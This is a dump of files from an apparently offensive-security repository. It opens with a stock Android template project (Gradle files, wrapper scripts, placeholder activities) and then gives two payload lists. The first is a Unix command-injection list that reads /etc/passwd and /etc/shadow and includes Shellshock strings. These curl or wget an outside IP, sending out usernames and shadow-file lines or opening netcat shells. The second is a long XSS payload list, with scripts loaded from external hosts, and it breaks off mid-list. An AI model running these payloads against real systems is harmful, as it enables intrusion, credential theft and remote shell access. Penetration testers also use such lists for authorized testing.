// Top-level build file where you can add configuration options common to all sub-projects/modules. buildscript { repositories { google() jcenter() } dependencies { classpath 'com.android.tools.build:gradle:3.1.3' // NOTE: Do not place your application dependencies here; they belong // in the individual module build.gradle files } } allprojects { repositories { google() jcenter() } } task clean(type: Delete) { delete rootProject.buildDir }
h4cker/mobile_security/OmarsApplication/gradle.properties
# Project-wide Gradle settings. # IDE (e.g. Android Studio) users: # Gradle settings configured through the IDE *will override* # any settings specified in this file. # For more details on how to configure your build environment visit # http://www.gradle.org/docs/current/userguide/build_environment.html # Specifies the JVM arguments used for the daemon process. # The setting is particularly useful for tweaking memory settings. org.gradle.jvmargs=-Xmx1536m # When configured, Gradle will run in incubating parallel mode. # This option should only be used with decoupled projects. More details, visit # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects # org.gradle.parallel=true
h4cker/mobile_security/OmarsApplication/gradlew
#!/usr/bin/env sh ############################################################################## ## ## Gradle start up script for UN*X ## ############################################################################## # Attempt to set APP_HOME # Resolve links: $0 may be a link PRG="$0" # Need this for relative symlinks. while [ -h "$PRG" ] ; do ls=`ls -ld "$PRG"` link=`expr "$ls" : '.*-> \(.*\)$'` if expr "$link" : '/.*' > /dev/null; then PRG="$link" else PRG=`dirname "$PRG"`"/$link" fi done SAVED="`pwd`" cd "`dirname \"$PRG\"`/" >/dev/null APP_HOME="`pwd -P`" cd "$SAVED" >/dev/null APP_NAME="Gradle" APP_BASE_NAME=`basename "$0"` # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. DEFAULT_JVM_OPTS="" # Use the maximum available, or set MAX_FD != -1 to use that value. MAX_FD="maximum" warn () { echo "$*" } die () { echo echo "$*" echo exit 1 } # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false case "`uname`" in CYGWIN* ) cygwin=true ;; Darwin* ) darwin=true ;; MINGW* ) msys=true ;; NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar # Determine the Java command to use to start the JVM. if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables JAVACMD="$JAVA_HOME/jre/sh/java" else JAVACMD="$JAVA_HOME/bin/java" fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else JAVACMD="java" which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi # Increase the maximum file descriptors if we can. if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then MAX_FD_LIMIT=`ulimit -H -n` if [ $? -eq 0 ] ; then if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then MAX_FD="$MAX_FD_LIMIT" fi ulimit -n $MAX_FD if [ $? -ne 0 ] ; then warn "Could not set maximum file descriptor limit: $MAX_FD" fi else warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" fi fi # For Darwin, add options to specify how the application appears in the dock if $darwin; then GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" fi # For Cygwin, switch paths to Windows format before running java if $cygwin ; then APP_HOME=`cygpath --path --mixed "$APP_HOME"` CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` JAVACMD=`cygpath --unix "$JAVACMD"` # We build the pattern for arguments to be converted via cygpath ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` SEP="" for dir in $ROOTDIRSRAW ; do ROOTDIRS="$ROOTDIRS$SEP$dir" SEP="|" done OURCYGPATTERN="(^($ROOTDIRS))" # Add a user-defined pattern to the cygpath arguments if [ "$GRADLE_CYGPATTERN" != "" ] ; then OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" fi # Now convert the arguments - kludge to limit ourselves to /bin/sh i=0 for arg in "$@" ; do CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` else eval `echo args$i`="\"$arg\"" fi i=$((i+1)) done case $i in (0) set -- ;; (1) set -- "$args0" ;; (2) set -- "$args0" "$args1" ;; (3) set -- "$args0" "$args1" "$args2" ;; (4) set -- "$args0" "$args1" "$args2" "$args3" ;; (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; esac fi # Escape application args save () { for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done echo " " } APP_ARGS=$(save "$@") # Collect all arguments for the java command, following the shell quoting and substitution rules eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" # by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then cd "$(dirname "$0")" fi exec "$JAVACMD" "$@"
h4cker/mobile_security/OmarsApplication/gradlew.bat
@if "%DEBUG%" == "" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @rem @rem ########################################################################## @rem Set local scope for the variables with windows NT shell if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 if "%DIRNAME%" == "" set DIRNAME=. set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. set DEFAULT_JVM_OPTS= @rem Find java.exe if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 if "%ERRORLEVEL%" == "0" goto init echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. echo. echo Please set the JAVA_HOME variable in your environment to match the echo location of your Java installation. goto fail :findJavaFromJavaHome set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe if exist "%JAVA_EXE%" goto init echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% echo. echo Please set the JAVA_HOME variable in your environment to match the echo location of your Java installation. goto fail :init @rem Get command-line arguments, handling Windows variants if not "%OS%" == "Windows_NT" goto win9xME_args :win9xME_args @rem Slurp the command line arguments. set CMD_LINE_ARGS= set _SKIP=2 :win9xME_args_slurp if "x%~1" == "x" goto execute set CMD_LINE_ARGS=%* :execute @rem Setup the command line set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% :end @rem End local scope for the variables with windows NT shell if "%ERRORLEVEL%"=="0" goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 exit /b 1 :mainEnd if "%OS%"=="Windows_NT" endlocal :omega
h4cker/mobile_security/OmarsApplication/app/build.gradle
apply plugin: 'com.android.application' android { compileSdkVersion 28 defaultConfig { applicationId "org.h4cker.omar.omarsapplication" minSdkVersion 27 targetSdkVersion 28 versionCode 1 versionName "1.0" testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner" } buildTypes { release { minifyEnabled false proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro' } } } dependencies { implementation fileTree(dir: 'libs', include: ['*.jar']) implementation 'com.android.support:appcompat-v7:28.0.0-alpha3' implementation 'com.android.support:support-v4:28.0.0-alpha3' implementation 'com.android.support:recyclerview-v7:28.0.0-alpha3' implementation 'com.android.support:design:28.0.0-alpha3' testImplementation 'junit:junit:4.12' androidTestImplementation 'com.android.support.test:runner:1.0.2' androidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2' }
h4cker/mobile_security/OmarsApplication/app/proguard-rules.pro
# Add project specific ProGuard rules here. # You can control the set of applied configuration files using the # proguardFiles setting in build.gradle. # # For more details, see # http://developer.android.com/guide/developing/tools/proguard.html # If your project uses WebView with JS, uncomment the following # and specify the fully qualified class name to the JavaScript interface # class: #-keepclassmembers class fqcn.of.javascript.interface.for.webview { # public *; #} # Uncomment this to preserve the line number information for # debugging stack traces. #-keepattributes SourceFile,LineNumberTable # If you keep the line number information, uncomment this to # hide the original source file name. #-renamesourcefileattribute SourceFile
JSON
h4cker/mobile_security/OmarsApplication/app/release/output.json
[{"outputType":{"type":"APK"},"apkInfo":{"type":"MAIN","splits":[],"versionCode":1,"versionName":"1.0","enabled":true,"outputFile":"app-release.apk","fullName":"release","baseName":"release"},"path":"app-release.apk","properties":{}}]
Java
h4cker/mobile_security/OmarsApplication/app/src/androidTest/java/org/h4cker/omar/omarsapplication/ExampleInstrumentedTest.java
package org.h4cker.omar.omarsapplication; import android.content.Context; import android.support.test.InstrumentationRegistry; import android.support.test.runner.AndroidJUnit4; import org.junit.Test; import org.junit.runner.RunWith; import static org.junit.Assert.*; /** * Instrumented test, which will execute on an Android device. * * @see <a href="http://d.android.com/tools/testing">Testing documentation</a> */ @RunWith(AndroidJUnit4.class) public class ExampleInstrumentedTest { @Test public void useAppContext() { // Context of the app under test. Context appContext = InstrumentationRegistry.getTargetContext(); assertEquals("org.h4cker.omar.omarsapplication", appContext.getPackageName()); } }
Java
h4cker/mobile_security/OmarsApplication/app/src/main/java/org/h4cker/omar/omarsapplication/ItemDetailActivity.java
package org.h4cker.omar.omarsapplication; import android.content.Intent; import android.os.Bundle; import android.support.design.widget.FloatingActionButton; import android.support.design.widget.Snackbar; import android.support.v7.widget.Toolbar; import android.view.View; import android.support.v7.app.AppCompatActivity; import android.support.v7.app.ActionBar; import android.view.MenuItem; /** * An activity representing a single Item detail screen. This * activity is only used on narrow width devices. On tablet-size devices, * item details are presented side-by-side with a list of items * in a {@link ItemListActivity}. */ public class ItemDetailActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_item_detail); Toolbar toolbar = (Toolbar) findViewById(R.id.detail_toolbar); setSupportActionBar(toolbar); FloatingActionButton fab = (FloatingActionButton) findViewById(R.id.fab); fab.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { Snackbar.make(view, "Replace with your own detail action", Snackbar.LENGTH_LONG) .setAction("Action", null).show(); } }); // Show the Up button in the action bar. ActionBar actionBar = getSupportActionBar(); if (actionBar != null) { actionBar.setDisplayHomeAsUpEnabled(true); } // savedInstanceState is non-null when there is fragment state // saved from previous configurations of this activity // (e.g. when rotating the screen from portrait to landscape). // In this case, the fragment will automatically be re-added // to its container so we don't need to manually add it. // For more information, see the Fragments API guide at: // // http://developer.android.com/guide/components/fragments.html // if (savedInstanceState == null) { // Create the detail fragment and add it to the activity // using a fragment transaction. Bundle arguments = new Bundle(); arguments.putString(ItemDetailFragment.ARG_ITEM_ID, getIntent().getStringExtra(ItemDetailFragment.ARG_ITEM_ID)); ItemDetailFragment fragment = new ItemDetailFragment(); fragment.setArguments(arguments); getSupportFragmentManager().beginTransaction() .add(R.id.item_detail_container, fragment) .commit(); } } @Override public boolean onOptionsItemSelected(MenuItem item) { int id = item.getItemId(); if (id == android.R.id.home) { // This ID represents the Home or Up button. In the case of this // activity, the Up button is shown. For // more details, see the Navigation pattern on Android Design: // // http://developer.android.com/design/patterns/navigation.html#up-vs-back // navigateUpTo(new Intent(this, ItemListActivity.class)); return true; } return super.onOptionsItemSelected(item); } }
Java
h4cker/mobile_security/OmarsApplication/app/src/main/java/org/h4cker/omar/omarsapplication/ItemDetailFragment.java
package org.h4cker.omar.omarsapplication; import android.app.Activity; import android.support.design.widget.CollapsingToolbarLayout; import android.os.Bundle; import android.support.v4.app.Fragment; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.TextView; import org.h4cker.omar.omarsapplication.dummy.DummyContent; /** * A fragment representing a single Item detail screen. * This fragment is either contained in a {@link ItemListActivity} * in two-pane mode (on tablets) or a {@link ItemDetailActivity} * on handsets. */ public class ItemDetailFragment extends Fragment { /** * The fragment argument representing the item ID that this fragment * represents. */ public static final String ARG_ITEM_ID = "item_id"; /** * The dummy content this fragment is presenting. */ private DummyContent.DummyItem mItem; /** * Mandatory empty constructor for the fragment manager to instantiate the * fragment (e.g. upon screen orientation changes). */ public ItemDetailFragment() { } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); if (getArguments().containsKey(ARG_ITEM_ID)) { // Load the dummy content specified by the fragment // arguments. In a real-world scenario, use a Loader // to load content from a content provider. mItem = DummyContent.ITEM_MAP.get(getArguments().getString(ARG_ITEM_ID)); Activity activity = this.getActivity(); CollapsingToolbarLayout appBarLayout = (CollapsingToolbarLayout) activity.findViewById(R.id.toolbar_layout); if (appBarLayout != null) { appBarLayout.setTitle(mItem.content); } } } @Override public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View rootView = inflater.inflate(R.layout.item_detail, container, false); // Show the dummy content as text in a TextView. if (mItem != null) { ((TextView) rootView.findViewById(R.id.item_detail)).setText(mItem.details); } return rootView; } }
Java
h4cker/mobile_security/OmarsApplication/app/src/main/java/org/h4cker/omar/omarsapplication/ItemListActivity.java
package org.h4cker.omar.omarsapplication; import android.content.Context; import android.content.Intent; import android.os.Bundle; import android.support.annotation.NonNull; import android.support.v7.app.AppCompatActivity; import android.support.v7.widget.RecyclerView; import android.support.v7.widget.Toolbar; import android.support.design.widget.FloatingActionButton; import android.support.design.widget.Snackbar; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.TextView; import org.h4cker.omar.omarsapplication.dummy.DummyContent; import java.util.List; /** * An activity representing a list of Items. This activity * has different presentations for handset and tablet-size devices. On * handsets, the activity presents a list of items, which when touched, * lead to a {@link ItemDetailActivity} representing * item details. On tablets, the activity presents the list of items and * item details side-by-side using two vertical panes. */ public class ItemListActivity extends AppCompatActivity { /** * Whether or not the activity is in two-pane mode, i.e. running on a tablet * device. */ private boolean mTwoPane; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_item_list); Toolbar toolbar = (Toolbar) findViewById(R.id.toolbar); setSupportActionBar(toolbar); toolbar.setTitle(getTitle()); FloatingActionButton fab = (FloatingActionButton) findViewById(R.id.fab); fab.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View view) { Snackbar.make(view, "Replace with your own action", Snackbar.LENGTH_LONG) .setAction("Action", null).show(); } }); if (findViewById(R.id.item_detail_container) != null) { // The detail container view will be present only in the // large-screen layouts (res/values-w900dp). // If this view is present, then the // activity should be in two-pane mode. mTwoPane = true; } View recyclerView = findViewById(R.id.item_list); assert recyclerView != null; setupRecyclerView((RecyclerView) recyclerView); } private void setupRecyclerView(@NonNull RecyclerView recyclerView) { recyclerView.setAdapter(new SimpleItemRecyclerViewAdapter(this, DummyContent.ITEMS, mTwoPane)); } public static class SimpleItemRecyclerViewAdapter extends RecyclerView.Adapter<SimpleItemRecyclerViewAdapter.ViewHolder> { private final ItemListActivity mParentActivity; private final List<DummyContent.DummyItem> mValues; private final boolean mTwoPane; private final View.OnClickListener mOnClickListener = new View.OnClickListener() { @Override public void onClick(View view) { DummyContent.DummyItem item = (DummyContent.DummyItem) view.getTag(); if (mTwoPane) { Bundle arguments = new Bundle(); arguments.putString(ItemDetailFragment.ARG_ITEM_ID, item.id); ItemDetailFragment fragment = new ItemDetailFragment(); fragment.setArguments(arguments); mParentActivity.getSupportFragmentManager().beginTransaction() .replace(R.id.item_detail_container, fragment) .commit(); } else { Context context = view.getContext(); Intent intent = new Intent(context, ItemDetailActivity.class); intent.putExtra(ItemDetailFragment.ARG_ITEM_ID, item.id); context.startActivity(intent); } } }; SimpleItemRecyclerViewAdapter(ItemListActivity parent, List<DummyContent.DummyItem> items, boolean twoPane) { mValues = items; mParentActivity = parent; mTwoPane = twoPane; } @Override public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) { View view = LayoutInflater.from(parent.getContext()) .inflate(R.layout.item_list_content, parent, false); return new ViewHolder(view); } @Override public void onBindViewHolder(final ViewHolder holder, int position) { holder.mIdView.setText(mValues.get(position).id); holder.mContentView.setText(mValues.get(position).content); holder.itemView.setTag(mValues.get(position)); holder.itemView.setOnClickListener(mOnClickListener); } @Override public int getItemCount() { return mValues.size(); } class ViewHolder extends RecyclerView.ViewHolder { final TextView mIdView; final TextView mContentView; ViewHolder(View view) { super(view); mIdView = (TextView) view.findViewById(R.id.id_text); mContentView = (TextView) view.findViewById(R.id.content); } } } }
Java
h4cker/mobile_security/OmarsApplication/app/src/main/java/org/h4cker/omar/omarsapplication/dummy/DummyContent.java
package org.h4cker.omar.omarsapplication.dummy; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; /** * Helper class for providing sample content for user interfaces created by * Android template wizards. * <p> * TODO: Replace all uses of this class before publishing your app. */ public class DummyContent { /** * An array of sample (dummy) items. */ public static final List<DummyItem> ITEMS = new ArrayList<DummyItem>(); /** * A map of sample (dummy) items, by ID. */ public static final Map<String, DummyItem> ITEM_MAP = new HashMap<String, DummyItem>(); private static final int COUNT = 25; static { // Add some sample items. for (int i = 1; i <= COUNT; i++) { addItem(createDummyItem(i)); } } private static void addItem(DummyItem item) { ITEMS.add(item); ITEM_MAP.put(item.id, item); } private static DummyItem createDummyItem(int position) { return new DummyItem(String.valueOf(position), "Item " + position, makeDetails(position)); } private static String makeDetails(int position) { StringBuilder builder = new StringBuilder(); builder.append("Details about Item: ").append(position); for (int i = 0; i < position; i++) { builder.append("\nMore details information here."); } return builder.toString(); } /** * A dummy item representing a piece of content. */ public static class DummyItem { public final String id; public final String content; public final String details; public DummyItem(String id, String content, String details) { this.id = id; this.content = content; this.details = details; } @Override public String toString() { return content; } } }
Java
h4cker/mobile_security/OmarsApplication/app/src/test/java/org/h4cker/omar/omarsapplication/ExampleUnitTest.java
package org.h4cker.omar.omarsapplication; import org.junit.Test; import static org.junit.Assert.*; /** * Example local unit test, which will execute on the development machine (host). * * @see <a href="http://d.android.com/tools/testing">Testing documentation</a> */ public class ExampleUnitTest { @Test public void addition_isCorrect() { assertEquals(4, 2 + 2); } }
h4cker/mobile_security/OmarsApplication/gradle/wrapper/gradle-wrapper.properties
#Sat Jun 16 13:01:52 EDT 2018 distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists distributionUrl=https\://services.gradle.org/distributions/gradle-4.4-all.zip
Text
h4cker/more_payloads/command_injection_unix.txt
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt; &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; /index.html|id| ;id; ;id ;netstat -a; ;system('cat%20/etc/passwd') ;id; |id |/usr/bin/id |id| |/usr/bin/id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` `/usr/bin/id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; a|id |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; a|/usr/bin/id ;system('cat%20/etc/passwd') ;system('id') ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a `id` $;/usr/bin/id () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" cat /etc/hosts $(`cat /etc/passwd`) cat /etc/passwd %0Acat%20/etc/passwd {{ get_user_file("/etc/passwd") }} <!--#exec cmd="/bin/cat /etc/passwd"--> <!--#exec cmd="/bin/cat /etc/shadow"--> <!--#exec cmd="/usr/bin/id;--> system('cat /etc/passwd'); <?php system("cat /etc/passwd");?>
Text
h4cker/more_payloads/more-xxs-payloads.txt
"-prompt(8)-" '-prompt(8)-' ";a=prompt,a()// ';a=prompt,a()// '-eval("window['pro'%2B'mpt'](8)")-' "-eval("window['pro'%2B'mpt'](8)")-" "onclick=prompt(8)>"@x.y "onclick=prompt(8)><svg/onload=prompt(8)>"@x.y <image/src/onerror=prompt(8)> <img/src/onerror=prompt(8)> <image src/onerror=prompt(8)> <img src/onerror=prompt(8)> <image src =q onerror=prompt(8)> <img src =q onerror=prompt(8)> </scrip</script>t><img src =q onerror=prompt(8)> <svg onload=alert(1)> "><svg onload=alert(1)// "onmouseover=alert(1)// "autofocus/onfocus=alert(1)// '-alert(1)-' '-alert(1)// \'-alert(1)// </script><svg onload=alert(1)> <x contenteditable onblur=alert(1)>lose focus! <x onclick=alert(1)>click this! <x oncopy=alert(1)>copy this! <x oncontextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x ondblclick=alert(1)>double click this! <x ondrag=alert(1)>drag this! <x contenteditable onfocus=alert(1)>focus this! <x contenteditable oninput=alert(1)>input here! <x contenteditable onkeydown=alert(1)>press any key! <x contenteditable onkeypress=alert(1)>press any key! <x contenteditable onkeyup=alert(1)>press any key! <x onmousedown=alert(1)>click this! <x onmousemove=alert(1)>hover this! <x onmouseout=alert(1)>hover this! <x onmouseover=alert(1)>hover this! <x onmouseup=alert(1)>click this! <x contenteditable onpaste=alert(1)>paste here! <script>alert(1)// <script>alert(1)<!– <script src=//brutelogic.com.br/1.js> <script src=//3334957647/1> %3Cx onxxx=alert(1) <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 <X onxxx=1 <x OnXxx=1 <X OnXxx=1 <x onxxx=1 onxxx=1 <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 <x 1='1'onxxx=1 <x 1="1"onxxx=1 <x </onxxx=1 <x 1=">" onxxx=1 <http://onxxx%3D1/ <x onxxx=alert(1) 1=' <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> 'onload=alert(1)><svg/1=' '>alert(1)</script><script/1=' */alert(1)</script><script>/* */alert(1)">'onload="/*<svg/1=' `-alert(1)">'onload="`<svg/1=' */</script>'>alert(1)/*<script/1=' <script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click <math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> <svg><script xlink:href=data:,alert(1) /> <math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> <html ontouchstart=alert(1)> <html ontouchend=alert(1)> <html ontouchmove=alert(1)> <html ontouchcancel=alert(1)> <body onorientationchange=alert(1)> "><img src=1 onerror=alert(1)>.gif <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; <script src="data:&comma;alert(1)// "><script src=data:&comma;alert(1)// <script src="//brutelogic.com.br&sol;1.js&num; "><script src=//brutelogic.com.br&sol;1.js&num; <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; <base href=//0> <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) <body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x <body onscroll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body onresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) <marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src onloadstart=alert(1)> <video onloadstart=alert(1)><source> <input autofocus onblur=alert(1)> <keygen autofocus onfocus=alert(1)> <form onsubmit=alert(1)><input type=submit> <select onchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x onshow=alert(1)>right click me! alert`1` alert&lpar;1&rpar; alert&#x28;1&#x29 alert&#40;1&#41 (alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) navigator.vibrate(500) eval(URL.slice(-8))>#alert(1) eval(location.hash.slice(1)>#alert(1) innerHTML=location.hash>#<script>alert(1)</script> <a draggable="true" ondrag="alert(1)">test</a> <a draggable="true" ondragend="alert(1)">test</a> <a draggable="true" ondragenter="alert(1)">test</a> <a draggable="true" ondragleave="alert(1)">test</a> <a draggable="true" ondragstart="alert(1)">test</a> <a id=x tabindex=1 onactivate=alert(1)></a> <a id=x tabindex=1 onbeforeactivate=alert(1)></a> <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus> <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus> <a id=x tabindex=1 onfocus=alert(1)></a> <a id=x tabindex=1 onfocusin=alert(1)></a> <a onbeforecopy="alert(1)" contenteditable>test</a> <a onbeforecut="alert(1)" contenteditable>test</a> <a onbeforepaste="alert(1)" contenteditable>test</a> <a onblur=alert(1) tabindex=1 id=x></a><input autofocus> <a onclick="alert(1)">test</a> <a oncontextmenu="alert(1)">test</a> <a oncopy="alert(1)" contenteditable>test</a> <a oncut="alert(1)" contenteditable>test</a> <a 